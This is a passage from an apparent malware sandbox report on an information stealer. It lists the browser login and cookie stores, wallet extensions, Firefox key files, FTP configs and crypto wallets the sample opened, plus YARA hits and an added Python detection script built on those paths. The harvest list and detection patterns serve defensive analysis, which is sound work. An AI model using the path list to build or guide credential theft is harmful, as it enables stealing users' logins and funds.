Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: number of queries: 1001
Source: Yara match File source: 0.3.s31ydU1MpQ.exe.12c3191.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.s31ydU1MpQ.exe.12c3191.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1415425762.000000000131C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415818290.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1367343816.0000000001319000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415450918.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR
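The file-open list above is the stealer's harvesting footprint: Chromium credential and cookie stores (Login Data, Web Data, History, Network\Cookies), the Local/Sync Extension Settings directories of wallet extensions (Chrome extension IDs are 32 letters from a to p), the Firefox profile files that hold saved logins (key4.db, logins.json, cert9.db, cookies.sqlite, places.sqlite), FTP client configuration directories and desktop wallet directories. A single process touching several of these categories in one run is a stronger signal than any one path. The script below is an added example, not part of the sandbox report: it parses constructed lines in the report's own "Source: <process> File opened: <path>" shape, buckets each path into one of those categories using the path fragments listed above, ignores a browser reading its own profile, and flags any process that reaches three or more categories. The process name sample.exe, the profile name ab12cd34.default-release and the threshold of three are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the report's "Source: <process> <op>: <path>" shape.
# They imitate the analysis above but are not copied from it; "sample.exe" and the
# Firefox profile name are made up. The trailing "Jump to behavior" on one line
# mirrors the web residue seen in exported reports and is tolerated by the parser.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\key4.db
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\sample.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\sample.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\sample.exe Directory queried: C:\Users\user\Documents
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
"""

# One report line: process, operation, path, with optional "Jump to behavior" residue.
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+(?P<op>File opened|Directory queried):\s+"
    r"(?P<path>.+?)(?:\s+Jump to behavior)?\s*$"
)

EXT_ID = r"[a-p]{32}"  # Chrome extension IDs: 32 characters, alphabet a..p

# Category name and a pattern built from the path fragments seen in the report.
CATEGORIES = [
    ("browser_extension_storage",
     re.compile(r"\\(?:Local|Sync) Extension Settings\\" + EXT_ID + r"$", re.I)),
    ("browser_credential_store",
     re.compile(r"\\User Data\\.*\\(?:Login Data(?: For Account)?|Web Data|History|Network\\Cookies)$", re.I)),
    ("firefox_profile",
     re.compile(r"\\Mozilla\\Firefox\\Profiles(?:\\|$)", re.I)),
    ("ftp_client_config",
     re.compile(r"\\(?:FTPbox|FTPRush|FTPGetter|FTPInfo|SmartFTP|3D-FTP)(?:\\|$)", re.I)),
    ("crypto_wallet",
     re.compile(r"\\(?:Exodus|Ledger Live|atomic|Coinomi|Bitcoin|Binance|com\.liberty\.jaxx|Electrum(?:-LTC)?|Guarda)(?:\\|$)", re.I)),
]

# A browser opening its own profile store is expected and must not count.
OWN_STORE = {
    "chrome.exe": {"browser_extension_storage", "browser_credential_store"},
    "msedge.exe": {"browser_extension_storage", "browser_credential_store"},
    "firefox.exe": {"firefox_profile"},
}


def parse_events(log_text):
    """Return (process, operation, path) tuples for every parsable line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m["proc"], m["op"], m["path"]))
    return events


def classify(path):
    """Map a path to a sensitive-data category, or None if it is uninteresting."""
    for name, pattern in CATEGORIES:
        if pattern.search(path):
            return name
    return None


def triage(log_text, min_categories=3):
    """Aggregate file opens per process and flag processes that span many categories."""
    per_proc = defaultdict(lambda: {"categories": set(), "extension_ids": set(), "events": 0})
    for proc, op, path in parse_events(log_text):
        if op != "File opened":
            continue  # directory enumeration alone is too noisy to score here
        cat = classify(path)
        if cat is None:
            continue
        exe = proc.rsplit("\\", 1)[-1].lower()
        if cat in OWN_STORE.get(exe, set()):
            continue  # browser reading its own profile
        rec = per_proc[proc]
        rec["events"] += 1
        rec["categories"].add(cat)
        if cat == "browser_extension_storage":
            rec["extension_ids"].add(path.rsplit("\\", 1)[-1].lower())
    for rec in per_proc.values():
        rec["suspicious"] = len(rec["categories"]) >= min_categories
    return dict(per_proc)


if __name__ == "__main__":
    for proc, rec in triage(SAMPLE_LOG).items():
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(f"{flag:10} {proc}: {rec['events']} opens across {sorted(rec['categories'])}")
```

The category list is deliberately keyed to the directories this sample actually touched; on a real host, feed it Sysmon event ID 11/FileCreate or EDR file-open telemetry instead of sandbox text, and expect to tune the owner allowlist for backup agents and password managers that legitimately read browser stores.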

Remote Access Functionality

Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000B.00000003.1623078762.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1681988687.0000000000681000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP